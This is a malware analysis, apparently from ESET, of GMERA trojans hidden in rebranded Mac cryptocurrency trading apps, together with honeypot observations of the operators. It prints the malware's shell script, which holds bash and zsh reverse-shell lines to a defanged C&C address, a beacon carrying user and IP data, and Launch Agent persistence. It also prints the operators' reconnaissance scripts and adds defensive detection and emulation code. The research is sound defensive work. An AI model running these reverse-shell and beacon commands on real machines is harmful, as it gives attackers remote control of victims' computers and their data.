ESET researchers lure GMERA malware operators to remotely control their Mac honeypots
We've recently discovered websites distributing malicious cryptocurrency trading applications for Mac. This malware is used to steal information such as browser cookies, cryptocurrency wallets and screen captures. Analyzing the malware samples, we quickly found that this was a new campaign of what Trend Micro researchers called GMERA in an analysis they published in September 2019. As in the previous campaigns, the malware reports to a C&C server over HTTP and connects remote terminal sessions to another C&C server using a hardcoded IP address. This time, however, the malware authors did not just wrap the original, legitimate application to include malware; they also rebranded the Kattana trading application under new names and copied its original website. We have seen the following fictitious brandings used in different campaigns: Cointrazer, Cupatrade, Licatrade and Trezarus. In addition to analyzing the malware code, ESET researchers also set up honeypots to try to reveal the motivations behind this group of criminals.
We have not yet been able to find exactly where these trojanized applications are promoted. However, in March 2020, Kattana posted a warning suggesting that victims were approached individually to lure them into downloading a trojanized app. We couldn't confirm that it was linked to this particular campaign, but it could very well be the case.
Figure 1. Kattana warns about trojanized copies of their software on Twitter
Copycat websites are set up to make the bogus application download look legitimate. To a person who doesn't know Kattana, the websites do look legitimate.
The download button on the bogus sites is a link to a ZIP archive containing the trojanized application bundle.
Malware analysis in this case is pretty straightforward. We will take the Licatrade sample as the example here. Other samples have minor differences, but the ideas and functionalities are essentially the same. Similar analyses of earlier GMERA campaigns are provided in Trend Micro's blogpost and in Objective-See's Mac malware of 2019 report.
Figure 4. Content of the Licatrade application bundle
Modification timestamps of the files in the ZIP archive, the date the application was signed, and the Last-Modified HTTP header when we downloaded the archive all show April 15th, 2020. This strongly suggests that this campaign started on that date.
A shell script (run.sh) is included in the resources of the application bundle. The main executable, written in Swift, launches run.sh. For some reason, the malware author duplicated the functionality to send a simple report to a C&C server over HTTP, and to connect to a remote host via TCP providing a remote shell to the attackers, in both the main executable and the shell script. An additional functionality, found in the shell script only, is to set up persistence by installing a Launch Agent.
Here is the full shell script source (ellipsis in long string and defanged):
#! /bin/bash
function remove_spec_char(){
echo "$1" | tr -dc '[:alnum:].r' | tr '[:upper:]' '[:lower:]'
}
whoami="$(remove_spec_char `whoami`)"
ip="$(remove_spec_char `curl -s ipecho.net/plain`)"
req=`curl -ks "http://stepbystepby[.]com/link.php?${whoami}&${ip}"`
plist_text="ZWNobyAnc2R2a21d2Vpdm5laXZuZSc="
echo "$plist_text" | base64 --decode > "/tmp/.com.apple.system.plist"
cp "/tmp/.com.apple.system.plist" "$HOME/Library/LaunchAgents/.com.apple.system.plist"
launchctl load "/tmp/.com.apple.system.plist"
scre=`screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212[.]97/25733 0>&1'`
It's interesting to note that persistence is broken in the Licatrade sample: the content of the resulting Launch Agent file (.com.apple.system.plist) isn't in Property List format as launchd expects, but is instead the raw command line to be executed.
The decoded content (ellipses in long strings) of the $plist_text variable is:
echo 'sdvkmsdfmsdkxweivneivne'; while :; do sleep 10000; screen -X quit; lsof -ti :25733 | xargs kill -9; screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212[.]97/25733 0>&1'; done; echo 'sdvkmsdfmsdfmsnicvmdskxweivneivne'
If this code ran, it would loop forever: sleep 10000 seconds, kill any existing screen session and any process bound to port 25733, then open a fresh reverse shell from the victim machine to the attacker-controlled server. Because launchd refuses a file that is not a property list, the Launch Agent never loads and none of this executes. Fortunately for the attackers, the last line of run.sh also starts a reverse shell to their server, so they still get access for the current session.
The Cointrazer sample, used in campaigns prior to Licatrade, does not suffer from this issue: the Launch Agent is installed and successfully starts when the user logs in.
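The following is an added example (not code from the ESET article) that turns the Licatrade persistence failure into a triage check for a LaunchAgents directory. It writes two constructed agents into a temporary directory: one mimicking the broken Licatrade file (raw shell text instead of a property list, decoded from $plist_text above, C&C address defanged) and one hypothetical well-formed agent that carries the same reverse-shell command in ProgramArguments, which is the shape a working variant such as Cointrazer's would need (its real content is not reproduced here; the well-formed plist is an assumption). The checks then flag the hidden Apple-looking filename, the unparseable plist that launchd would reject, and the reverse-shell fragments in either form.

```python
"""Triage macOS Launch Agents for GMERA-style reverse-shell persistence.

Added example, not ESET's tooling. The two suspicious agents below are
constructed: BROKEN_AGENT reproduces the decoded Licatrade $plist_text,
WORKING_AGENT is a hypothetical well-formed plist carrying the same command.
"""
import os
import plistlib
import re
import tempfile

# Decoded $plist_text from the Licatrade run.sh (C&C IP defanged as in the article).
BROKEN_AGENT = (
    "echo 'sdvkmsdfmsdkxweivneivne'; while :; do sleep 10000; screen -X quit; "
    "lsof -ti :25733 | xargs kill -9; "
    "screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212[.]97/25733 0>&1'; done; "
    "echo 'sdvkmsdfmsdfmsnicvmdskxweivneivne'\n"
)

# Hypothetical well-formed equivalent (assumption, not recovered from a sample).
WORKING_AGENT = {
    "Label": "com.apple.system",
    "RunAtLoad": True,
    "KeepAlive": True,
    "ProgramArguments": ["/bin/bash", "-c", "bash -i >/dev/tcp/193.37.212[.]97/25733 0>&1"],
}

# Command-line fragments that have no business in a persistent agent.
REVERSE_SHELL_PATTERNS = [
    re.compile(r"/dev/tcp/"),          # bash network redirection
    re.compile(r"\bztcp\b"),           # zsh/net/tcp module
    re.compile(r"screen\s+-d\s+-m"),   # detached screen session wrapper
    re.compile(r"bash\s+-i\b"),        # interactive shell with redirected fds
]


def triage_launch_agent(path):
    """Return a list of findings for one Launch Agent file (empty if clean)."""
    findings = []
    name = os.path.basename(path)
    if name.startswith("."):
        findings.append("hidden filename (dot-prefixed) in LaunchAgents")
    if name.startswith("com.apple.") or name.startswith(".com.apple."):
        findings.append("masquerades as an Apple label in a user-writable LaunchAgents dir")
    with open(path, "rb") as fh:
        raw = fh.read()
    try:
        plist = plistlib.loads(raw)
        args = plist.get("ProgramArguments") or []
        args = list(args) if isinstance(args, list) else []
        if plist.get("Program"):
            args = [plist["Program"]] + args
        haystack = " ".join(str(a) for a in args)
        for pat in REVERSE_SHELL_PATTERNS:
            if pat.search(haystack):
                findings.append("ProgramArguments contain reverse-shell pattern %r" % pat.pattern)
    except Exception:
        # launchd would refuse this file, so persistence is broken, but the
        # file is still a strong indicator: scan it as plain text instead.
        findings.append("not a valid property list (launchd will not load it)")
        text = raw.decode("utf-8", "replace")
        for pat in REVERSE_SHELL_PATTERNS:
            if pat.search(text):
                findings.append("raw text contains reverse-shell pattern %r" % pat.pattern)
    return findings


def triage_directory(agents_dir):
    """Map filename -> findings for every regular file in a LaunchAgents directory."""
    report = {}
    for name in sorted(os.listdir(agents_dir)):
        path = os.path.join(agents_dir, name)
        if os.path.isfile(path):
            report[name] = triage_launch_agent(path)
    return report


def build_sample_dir():
    """Write the constructed agents plus one benign agent into a temp dir."""
    d = tempfile.mkdtemp(prefix="launchagents_")
    with open(os.path.join(d, ".com.apple.system.plist"), "w") as f:
        f.write(BROKEN_AGENT)
    with open(os.path.join(d, "com.apple.system.plist"), "wb") as f:
        plistlib.dump(WORKING_AGENT, f)
    with open(os.path.join(d, "com.example.benign.plist"), "wb") as f:
        plistlib.dump({"Label": "com.example.benign", "ProgramArguments": ["/usr/bin/true"]}, f)
    return d


if __name__ == "__main__":
    for fname, found in triage_directory(build_sample_dir()).items():
        print(fname, "->", found or "clean")
```

On a real machine, point triage_directory at ~/Library/LaunchAgents and /Library/LaunchAgents; the same parse-then-scan split matters there, because a file launchd rejects still tells you a dropper ran, while a file it accepts is what actually survives a reboot.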
The various reverse shells used by these malware operators connect to different remote ports depending on how they were started (for example, 25733 for the bash-based shell and 25734 for the zsh-based one in the Licatrade sample). All connections are unencrypted. Here is a list of ports, based on the Licatrade sample.
Here are some example command lines used:
screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212[.]97/25733 0>&1'
zsh -c 'zmodload zsh/net/tcp && ztcp 193.37.212[.]97 25734 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
The rebranded Kattana application is also in the resources of the application bundle. We wanted to see whether, besides the change of name and icon, any other code had been changed. Since Kattana asks for trading-platform credentials in order to trade, we checked whether these input fields were tampered with and whether credentials were exfiltrated in some way. Kattana is built with Electron, and Electron apps ship an app.asar file, an archive containing the application's JavaScript code. We compared all differences between the original Kattana application and the malicious Licatrade copycat and found that only strings and images were changed.
Figure 5. Partial difference between Kattana and Licatrade
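The comparison described above can be reproduced on any pair of Electron builds by walking both app.asar archives and hashing every entry. The following is an added example (not ESET's tooling): it builds two tiny constructed archives in memory using the asar on-disk layout (an 8-byte size pickle, a JSON header pickle, then the concatenated file data), then reports which paths were added, removed or modified, separating JavaScript changes from changes to strings and images. The file names and contents are made up for the example; only the archive walk and the classification carry over to a real Kattana-versus-Licatrade diff.

```python
"""Diff the contents of two Electron app.asar archives.

Added example, not ESET's code. pack_asar exists only to construct test
archives; read_asar and diff_asar are what you would run on real samples.
Layout: [u32 4][u32 header_len] [u32 payload][u32 json_len][json, 4-padded] [file data].
"""
import hashlib
import json
import struct


def pack_asar(files):
    """Build an asar blob from {path: bytes}; '/' in a path creates directories."""
    header = {"files": {}}
    blobs, offset = [], 0
    for path, data in files.items():
        node = header["files"]
        parts = path.split("/")
        for part in parts[:-1]:
            node = node.setdefault(part, {"files": {}})["files"]
        node[parts[-1]] = {"size": len(data), "offset": str(offset)}  # offsets are strings in asar
        blobs.append(data)
        offset += len(data)
    js = json.dumps(header).encode()
    padded = js + b"\0" * (-len(js) % 4)
    header_pickle = struct.pack("<II", 4 + len(padded), len(js)) + padded
    size_pickle = struct.pack("<II", 4, len(header_pickle))
    return size_pickle + header_pickle + b"".join(blobs)


def read_asar(blob):
    """Parse an asar blob into {path: bytes} by walking the JSON header."""
    header_len = struct.unpack_from("<II", blob, 0)[1]
    json_len = struct.unpack_from("<II", blob, 8)[1]
    header = json.loads(blob[16:16 + json_len])
    base = 8 + header_len  # file data starts right after both pickles
    out = {}

    def walk(node, prefix):
        for name, meta in node["files"].items():
            if "files" in meta:  # directory
                walk(meta, prefix + name + "/")
            else:
                start = base + int(meta["offset"])
                out[prefix + name] = blob[start:start + meta["size"]]

    walk(header, "")
    return out


def diff_asar(original, suspect):
    """Classify entry changes between two archives by path and SHA-256."""
    a, b = read_asar(original), read_asar(suspect)
    sha = lambda d: hashlib.sha256(d).hexdigest()
    report = {"added": sorted(set(b) - set(a)), "removed": sorted(set(a) - set(b)),
              "code_changed": [], "asset_changed": []}
    for path in sorted(set(a) & set(b)):
        if sha(a[path]) != sha(b[path]):
            # Only .js counts as code; JSON string tables and images are assets.
            report["code_changed" if path.endswith(".js") else "asset_changed"].append(path)
    return report


# Constructed stand-ins for the legitimate build and the rebranded copy.
KATTANA = {
    "package.json": b'{"name":"kattana","productName":"Kattana"}',
    "dist/main.js": b"const login = (key, secret) => api.post('/auth', {key, secret});",
    "dist/locales/en.json": b'{"title":"Kattana - trading terminal"}',
    "dist/icon.png": b"\x89PNG\r\n\x1a\n...kattana-icon...",
}
LICATRADE = dict(KATTANA)
LICATRADE["package.json"] = b'{"name":"licatrade","productName":"Licatrade"}'
LICATRADE["dist/locales/en.json"] = b'{"title":"Licatrade - trading terminal"}'
LICATRADE["dist/icon.png"] = b"\x89PNG\r\n\x1a\n...licatrade-icon..."


def compare_samples():
    """Diff the two constructed archives; an empty code_changed list is the Licatrade finding."""
    return diff_asar(pack_asar(KATTANA), pack_asar(LICATRADE))


if __name__ == "__main__":
    print(json.dumps(compare_samples(), indent=2))
```

For real samples, read both app.asar files from Contents/Resources and pass the bytes to diff_asar; any entry under code_changed is where to look for credential theft, whereas a report that lists only locales, package metadata and images matches what was observed for Licatrade.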
Licatrade and its resources were all signed using the same certificate, with the common name field set to Andrey Novoselov and the developer ID M8WVDT659T. The certificate was issued by Apple on April 6th, 2020. It was revoked the same day we notified Apple about this malicious application.
Figure 6. Certificate used to sign Licatrade
Figure 7. Licatrade certificate was revoked May 28th, 2020
Each of the other campaigns we analyzed used a different certificate; both were already revoked by Apple when we started our analyses. See the IoCs section for details about these. It's interesting to note that in the case of Cointrazer, only 15 minutes elapsed between Apple issuing the certificate and the malefactors signing their trojanized application. This, and the fact that we didn't find anything else signed with the same key, suggests they obtained the certificate explicitly for that purpose.
The malicious Licatrade application was available on the licatrade.com website and its C&C HTTP report server domain is stepbystepby.com. Both domains were registered using the levistor777@gmail.com email address. Searching for other domains registered with that email address reveals what looks like several previous campaigns. Here is a list of domains we found in samples or registered with that email address.
Both the websites and the HTTP C&C servers receiving the malware's first report are hosted behind Cloudflare.
To learn more about the intentions of this group, we set up honeypots where we monitored all interactions between the GMERA reverse shell backdoors and the operators of this malware.
We saw no C&C commands issued via the HTTP C&C server channel; everything happened through the reverse shells. When the reverse shell first connected, the C&C server sent a small script to gather the username, the macOS version and the location (based on the external IP address) of the compromised device.
#! /bin/bash
function check() {
if [ ! -f /private/var/tmp/.i ]; then
write
else
if [ "$(( $(date +"%s") - $(stat -f "%m" /private/var/tmp/.i) ))" -gt "21600" ]; then
write
fi
fi
}
function write() {
getit=`curl -s ipinfo.io | grep -e country -e city | sed 's/[^a-zA-Z0-9]//g' | sed -e "s/city//g;s/country//g"`
echo `whoami` > /private/var/tmp/.i
echo `sw_vers -productVersion` >> /private/var/tmp/.i
echo "$getit" >> /private/var/tmp/.i
}
check
cat /private/var/tmp/.i
which sent something like this to the operators:
jeremy
10.13.4
Bratislava
SK
The TCP connection stays open and waits for further commands. In our case, after a while, the operators manually inspected the machine. Across several of our honeypots, the commands used to perform that inspection varied. Part of it was just listing files across the file system. Sometimes, they would copy-and-paste a base64-encoded script designed to list information to reveal whether the system is a honeypot or actually interesting. The script is decoded, then piped to bash.
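The first-contact exchange above can be replayed without any real implant. The following is an added example (not ESET's honeypot code): FakeC2 stands in for the operators' listener (193.37.212[.]97:25733 in the sample; here 127.0.0.1 on an ephemeral port, an assumption for offline use), accepts the reverse shell, pushes the reconnaissance script quoted above and parses the four-line reply. simulate_implant stands in for the victim's bash -i and answers with a constructed reply mirroring the honeypot output, so both sides of the protocol run locally.

```python
"""Emulate the operator end of the GMERA reverse-shell channel.

Added example, not ESET's honeypot code. Host/port are local assumptions;
RECON_SCRIPT is the operators' script from the capture; SAMPLE_REPLY is
constructed to mirror the honeypot output shown in the article.
"""
import socket
import threading

RECON_SCRIPT = b"""#! /bin/bash
function check() {
 if [ ! -f /private/var/tmp/.i ]; then
  write
 else
  if [ "$(( $(date +"%s") - $(stat -f "%m" /private/var/tmp/.i) ))" -gt "21600" ]; then
   write
  fi
 fi
}
function write() {
 getit=`curl -s ipinfo.io | grep -e country -e city | sed 's/[^a-zA-Z0-9]//g' | sed -e "s/city//g;s/country//g"`
 echo `whoami` > /private/var/tmp/.i
 echo `sw_vers -productVersion` >> /private/var/tmp/.i
 echo "$getit" >> /private/var/tmp/.i
}
check
cat /private/var/tmp/.i
"""

SAMPLE_REPLY = b"jeremy\n10.13.4\nBratislava\nSK\n"  # constructed


def parse_recon(reply):
    """Turn the `cat /private/var/tmp/.i` output into named fields.

    whoami, sw_vers, then the two grep hits (city, country) stripped to bare
    alphanumerics: exactly four non-empty lines, or it is not this script's reply.
    """
    lines = [l.strip() for l in reply.decode("utf-8", "replace").splitlines() if l.strip()]
    if len(lines) != 4:
        return None
    user, version, city, country = lines
    return {"user": user, "os_version": version, "city": city, "country": country}


class FakeC2:
    """Accept one reverse shell, send the recon script, collect and parse the answer."""

    def __init__(self, host="127.0.0.1", port=0):
        self.sock = socket.socket()
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))
        self.sock.listen(1)
        self.port = self.sock.getsockname()[1]
        self.result = None
        self.thread = threading.Thread(target=self._serve, daemon=True)
        self.thread.start()

    def _serve(self):
        conn, _ = self.sock.accept()
        with conn:
            conn.settimeout(5)
            conn.sendall(RECON_SCRIPT)  # the operators' first action on connect
            chunks = []
            while True:
                try:
                    data = conn.recv(4096)
                except socket.timeout:
                    break
                if not data:  # implant closed the channel
                    break
                chunks.append(data)
            self.result = parse_recon(b"".join(chunks))
        self.sock.close()

    def wait(self):
        self.thread.join(10)
        return self.result


def simulate_implant(port, reply, host="127.0.0.1"):
    """Stand-in for `bash -i >/dev/tcp/HOST/PORT 0>&1`: read the script, send output."""
    with socket.create_connection((host, port), timeout=5) as s:
        script = b""
        while not script.endswith(b"cat /private/var/tmp/.i\n"):
            chunk = s.recv(4096)
            if not chunk:
                break
            script += chunk
        s.sendall(reply)  # what `cat /private/var/tmp/.i` would print
        return script


def run_exchange(reply=SAMPLE_REPLY):
    """Return (script arrived intact?, parsed recon fields)."""
    c2 = FakeC2()
    received = simulate_implant(c2.port, reply)
    return received == RECON_SCRIPT, c2.wait()


if __name__ == "__main__":
    intact, fields = run_exchange()
    print("script delivered intact:", intact, "| recon fields:", fields)
```

Against a live sample, the same listener can be reached by redirecting the hardcoded C&C address to it (hosts file or firewall NAT in the analysis VM); a real bash -i session also echoes prompt text on the channel, so the reply would need to be trimmed to the lines the script printed before parse_recon is applied.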
Figure 8. Packet capture of the operator sending the base64-encoded secondary reconnaissance script
Here is the decoded script:
echo ""
echo "------ Whoami ------"
whoami
echo "------ IP info ------"
curl -s ipinfo.io
echo "------ Mac Model ------"
curl -s https://support-sp.apple.com/sp/product?cc=$(system_profiler SPHardwareDataType | awk '/Serial/ {print $4}' | cut -c 9-) | sed 's|.*
Excerpt from:
Mac cryptocurrency trading application rebranded, bundled with malware - We Live Security